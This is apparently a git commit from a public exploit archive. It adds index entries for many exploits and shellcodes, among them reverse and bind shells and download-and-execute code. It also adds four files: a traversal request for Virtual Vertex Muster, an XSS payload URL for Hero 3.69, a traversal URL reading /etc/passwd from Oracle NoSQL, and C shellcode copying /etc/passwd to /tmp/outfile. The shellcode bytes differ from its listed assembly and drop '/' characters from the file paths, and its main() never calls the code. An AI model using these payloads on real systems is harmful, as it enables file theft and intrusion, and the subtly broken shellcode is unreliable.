pythonmaster41
diff --git a/‎files.csv‎
Lines changed: 49 additions & 0 deletions b/‎files.csv‎
Lines changed: 49 additions & 0 deletions
diff --git a/‎platforms/asp/webapps/36375.txt‎
Lines changed: 11 additions & 0 deletions b/‎platforms/asp/webapps/36375.txt‎
Lines changed: 11 additions & 0 deletions
diff --git a/‎platforms/asp/webapps/36402.txt‎
Lines changed: 9 additions & 0 deletions b/‎platforms/asp/webapps/36402.txt‎
Lines changed: 9 additions & 0 deletions
diff --git a/‎platforms/java/webapps/36292.txt‎
Lines changed: 9 additions & 0 deletions b/‎platforms/java/webapps/36292.txt‎
Lines changed: 9 additions & 0 deletions
diff --git a/‎platforms/lin_x86-64/shellcode/36359.c‎
Lines changed: 62 additions & 0 deletions b/‎platforms/lin_x86-64/shellcode/36359.c‎
Lines changed: 62 additions & 0 deletions
@@ -32540,6 +32540,7 @@ id,file,description,date,author,platform,type,port
 36101,platforms/java/remote/36101.rb,"Java JMX Server Insecure Configuration Java Code Execution",2015-02-17,metasploit,java,remote,1617
 36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
 36103,platforms/php/webapps/36103.txt,"Mambo CMS AHS Shop Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
+36104,platforms/windows/local/36104.py,"Publish-It 3.6d - Buffer Overflow (SEH) Exploit",2015-02-18,"Andrew Smith",windows,local,0
 36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change Exploit",2015-02-18,"Todor Donev",hardware,webapps,0
 36106,platforms/php/webapps/36106.txt,"Mambo CMS N-Press Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
 36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 SQL Injection and Arbitrary File Upload Vulnerabilities",2011-09-02,KedAns-Dz,php,webapps,0
@@ -32564,6 +32565,7 @@ id,file,description,date,author,platform,type,port
 36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
 36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0
 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0
+36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection Vulnerability",2015-02-20,"K.d Long",xml,webapps,0
 36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 'CustomChart.aspx' Cross Site Scripting Vulnerability",2011-09-12,"Gustavo Roberto",asp,webapps,0
 36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0
 36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 'wpa_id' Parameter SQL Injection Vulnerability",2011-09-14,sherl0ck_,php,webapps,0
@@ -32637,6 +32639,7 @@ id,file,description,date,author,platform,type,port
 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
 36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
 36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
+36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0
 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service Vulnerability",2011-04-11,"Luigi Auriemma",windows,dos,0
@@ -32658,6 +32661,7 @@ id,file,description,date,author,platform,type,port
 36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0
 36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0
 36230,platforms/php/webapps/36230.txt,"Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability",2015-03-02,"Ibrahim Raafat",php,webapps,0
+36231,platforms/php/webapps/36231.py,"GoAutoDial CE 2.0 - Shell Upload",2015-02-28,R-73eN,php,webapps,0
 36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability",2015-03-02,Net.Edit0r,php,webapps,80
 36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0
 36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 Buffer Overflow Vulnerability and Denial of Service Vulnerability",2011-10-13,"Fredrik Widlund",multiple,dos,0
@@ -32668,6 +32672,8 @@ id,file,description,date,author,platform,type,port
 36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0
 36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0
 36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - LFI",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0
+36242,platforms/php/webapps/36242.txt,"Wordpress Theme Photocrati 4.x.x - SQL Injection & XSS",2015-03-03,ayastar,php,webapps,0
+36243,platforms/php/webapps/36243.txt,"WordPress cp-multi-view-calendar <= 1.1.4 - SQL Injection vulnerabilities",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0
 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 'xml/get_list.php' SQL Injection Vulnerability",2011-10-19,"Yuri Goltsev",php,webapps,0
 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 'cat' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Eyup CELIK",php,webapps,0
 36246,platforms/multiple/remote/36246.txt,"Splunk <= 4.1.6 'segment' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Filip Palian",multiple,remote,0
@@ -32697,7 +32703,9 @@ id,file,description,date,author,platform,type,port
 36271,platforms/osx/dos/36271.py,"Apple Mac OS X <= 10.6.5 And iOS <= 4.3.3 Mail Denial of Service Vulnerability",2011-10-29,shebang42,osx,dos,0
 36272,platforms/php/webapps/36272.txt,"Domain Shop 'index.php' Cross Site Scripting Vulnerability",2011-11-01,Mr.PaPaRoSSe,php,webapps,0
 36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 Multiple Remote File Include Vulnerabilities",2011-11-01,indoushka,php,webapps,0
+36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/shadow (55 Bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
 36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0
+36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd (55 Bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
 36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) 'str' Parameter Cross Site Scripting Vulnerability",2011-11-01,Isfahan,php,webapps,0
 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0
 36280,platforms/php/webapps/36280.txt,"Symphony <= 2.2.3 symphony/publish/images filter Parameter XSS",2011-11-01,"Mesut Timur",php,webapps,0
@@ -32712,6 +32720,7 @@ id,file,description,date,author,platform,type,port
 36289,platforms/php/webapps/36289.txt,"SmartJobBoard 'keywords' Parameter Cross Site Scripting Vulnerability",2011-11-07,Mr.PaPaRoSSe,php,webapps,0
 36290,platforms/php/webapps/36290.txt,"Admin Bot 'news.php' SQL Injection Vulnerability",2011-11-07,baltazar,php,webapps,0
 36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0
+36292,platforms/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Parameter Directory Traversal Vulnerability",2011-11-07,Buherátor,java,webapps,0
 36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 'command_name' Parameter Remote Command Execution Vulnerability",2011-11-04,"Christophe de la Fuente",php,webapps,0
 36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0
 36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection Vulnerability",2011-11-08,Kalashinkov3,php,webapps,0
@@ -32776,6 +32785,8 @@ id,file,description,date,author,platform,type,port
 36355,platforms/jsp/webapps/36355.txt,"HP Network Node Manager i 9.10 nnm/protected/ping.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
 36356,platforms/jsp/webapps/36356.txt,"HP Network Node Manager i 9.10 nnm/protected/statuspoll.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
 36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager i 9.10 nnm/protected/traceroute.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
+36358,platforms/php/webapps/36358.html,"CS-Cart 4.2.4 - CSRF",2015-03-11,"Luis Santana",php,webapps,0
+36359,platforms/lin_x86-64/shellcode/36359.c,"x86_64 Shellcode (118 Bytes) - Reads Data From /etc/passwd To /tmp/outfile (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0
 36360,platforms/windows/remote/36360.rb,"Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",2015-03-12,metasploit,windows,remote,0
 36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 'APPE' Command Remote Denial Of Service Vulnerability",2011-11-25,"Houssam Sahli",windows,dos,0
 36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 Multiple Cross Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0
@@ -32784,3 +32795,41 @@ id,file,description,date,author,platform,type,port
 36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0
 36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 /admin/admin_blocks.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0
 36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 /admin/admin_pages.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0
+36368,platforms/php/webapps/36368.txt,"WoltLab Community Gallery - Stored XSS",2015-03-13,"ITAS Team",php,webapps,0
+36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass Via HTTP Header Pollution",2015-03-12,"BGA Security",xml,webapps,0
+36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload (Code Execution)",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0
+36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - LFI Vulnerability",2015-03-12,"TUNISIAN CYBER",php,webapps,0
+36372,platforms/php/webapps/36372.txt,"Wordpress Theme DesignFolio Plus 1.2 - Arbitrary File Upload Vulnerability",2015-03-04,"Crash bandicot",php,webapps,0
+36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,"Crash bandicot",php,webapps,0
+36374,platforms/php/webapps/36374.txt,"Wordpress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,"Crash bandicot",php,webapps,0
+36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 Web Interface Directory Traversal Vulnerability",2011-11-29,"Nick Freeman",asp,webapps,0
+36376,platforms/windows/remote/36376.txt,"Oxide WebServer Directory Traversal Vulnerability",2011-11-29,demonalex,windows,remote,0
+36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 HTTP POST Request NULL Pointer Content-Length Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0
+36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 NULL Pointer Invalid HTTP Request Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0
+36379,platforms/php/webapps/36379.txt,"OrangeHRM <= 2.6.11 index.php Multiple Parameter XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0
+36380,platforms/php/webapps/36380.txt,"OrangeHRM <= 2.6.11 lib/controllers/CentralController.php URI XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0
+36381,platforms/php/webapps/36381.txt,"OrangeHRM <= 2.6.11 lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0
+36382,platforms/php/webapps/36382.txt,"WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross Site Scripting Vulnerability",2011-11-30,Am!r,php,webapps,0
+36383,platforms/php/webapps/36383.txt,"WordPress flash-album-gallery Plugin 'facebook.php' Cross Site Scripting Vulnerability",2011-11-30,Am!r,php,webapps,0
+36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 'index.php' Multiple SQL Injection Vulnerabilities",2011-11-30,"High-Tech Bridge SA",php,webapps,0
+36385,platforms/php/webapps/36385.txt,"Joomla Simple Photo Gallery 1.0 - SQL injection",2015-03-16,"Moneer Masoud",php,webapps,0
+36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Auth Bypass Vulnerability",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0
+36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash PoC",2015-03-16,"Avinash Thapa",linux,local,0
+36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0
+36391,platforms/lin_x86/shellcode/36391.c,"Shellcode - linux/x86 - ROT13 encoded execve(""/bin/sh"") (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
+36392,platforms/windows/dos/36392.txt,"Intel Network Adapter Diagnostic Driver - IOCTL Handling Vulnerability",2015-03-14,"Glafkos Charalambous ",windows,dos,0
+36393,platforms/lin_x86/shellcode/36393.c,"Shellcode - Linux/x86 - chmod 0777 /etc/shadow obfuscated (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
+36394,platforms/lin_x86/shellcode/36394.c,"Shellcode - linux/x86 - Obfuscated - map google.com to 127.1.1.1 (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
+36395,platforms/lin_x86/shellcode/36395.c,"Shellcode - linux/x86 - Obfuscated execve(""/bin/sh"") (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
+36397,platforms/lin_x86/shellcode/36397.c,"Shellcode - Linux/x86 - Reverse TCP Shell (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
+36398,platforms/lin_x86/shellcode/36398.c,"Shellcode - Linux/x86 - TCP Bind Shell (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
+36401,platforms/php/webapps/36401.txt,"AtMail 1.04 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0
+36402,platforms/asp/webapps/36402.txt,"Hero 3.69 'month' Parameter Cross Site Scripting Vulnerability",2011-12-01,"Gjoko Krstic",asp,webapps,0
+36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability",2011-12-02,"High-Tech Bridge SA",windows,dos,0
+36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability",2009-06-01,dividead,linux,dos,0
+36405,platforms/windows/dos/36405.txt,"Serv-U 11.1.0.3 - Denial of Service and Security Bypass Vulnerabilities",2011-12-05,"Luigi Auriemma",windows,dos,0
+36406,platforms/php/webapps/36406.txt,"Elxis CMS 2009 index.php task Parameter XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
+36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
+36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
+36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
+36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download &  execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/50841/info
+
+Virtual Vertex Muster is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
+
+Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks.
+
+Virtual Vertex Muster 6.1.6 is vulnerable; other versions may also be affected. 
+
+The following example request is available:
+
+GET /a\..\..\muster.db HTTP/1.1 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50878/info
+
+Hero is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Hero 3.69 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/hero_os/events?month=January.htaccess.aspx%22%3E%3Cscript%3Ealert%281%29%3C/script%3E 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50567/info
+
+Oracle NoSQL is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain arbitrary local files in the context of the webserver process.
+
+NoSQL 11g 1.1.100 R2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd 
@@ -0,0 +1,62 @@
+/*
+Reads data from /etc/passwd to /tmp/outfile
+No null bytes
+
+Author: Chris Higgins <chris@chigs.me>
+        @ch1gg1ns -- github.com/chiggins -- http://chigstuff.com/blog/2014/03/29/my-first-shellcode/
+        chigstuff.com
+Date:   3-27-2014
+Size:   118 bytes
+Tested: ArchLinux x86_64 3.13.6-1
+Assembly:
+        xor rax, rax
+        mov al, 2
+        xor rdi, rdi
+        mov rbx, 0x647773
+        push rbx
+        mov rbx, 0x7361702f6374652f
+        push rbx
+        lea rdi, [rsp]
+        xor rsi, rsi
+        syscall
+        mov rbx, rax
+        xor rax, rax
+        mov rdi, rbx
+        mov rsi, rsp
+        mov dx, 0xFFFF
+        syscall
+        mov r8, rax
+        mov rax, rsp
+        xor rbx, rbx
+        push rbx
+        mov rbx, 0x656c6966
+        push rbx
+        mov rbx, 0x74756f2f706d742f
+        push rbx
+        mov rbx, rax
+        xor rax, rax
+        mov al, 2
+        lea rdi, [rsp]
+        xor rsi, rsi
+        push 0x66
+        pop si
+        syscall
+        mov rdi, rax
+        xor rax, rax
+        mov al, 1
+        lea rsi, [rbx]
+        xor rdx, rdx
+        mov rdx, r8
+        syscall
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+char shellcode[] = "\x48\x31\xc0\xb0\x02\x48\x31\xff\xbb\x73\x77\x64\x00\x53\x48\xbb\x2f\x65\x74\x63\x70\x61\x73\x53\x48\x8d\x3c\x24\x48\x31\xf6\x0f\x05\x48\x89\xc3\x48\x31\xc0\x48\x89\xdf\x48\x89\xe6\x66\xba\xff\xff\x0f\x05\x49\x89\xc0\x48\x89\xe0\x48\x31\xdb\x53\xbb\x66\x69\x6c\x65\x53\x48\xbb\x2f\x74\x6d\x70\x6f\x75\x74\x53\x48\x89\xc3\x48\x31\xc0\xb0\x02\x48\x8d\x3c\x24\x48\x31\xf6\x6a\x66\x66\x5e\x0f\x05\x48\x89\xc7\x48\x31\xc0\xb0\x01\x48\x8d\x33\x48\x31\xd2\x4c\x89\xc2\x0f\x05";
+
+int main() {
+    printf("len: %d bytes", sizeof shellcode);
+    (*(void (*)()) shellcode);
+    return 0;
+}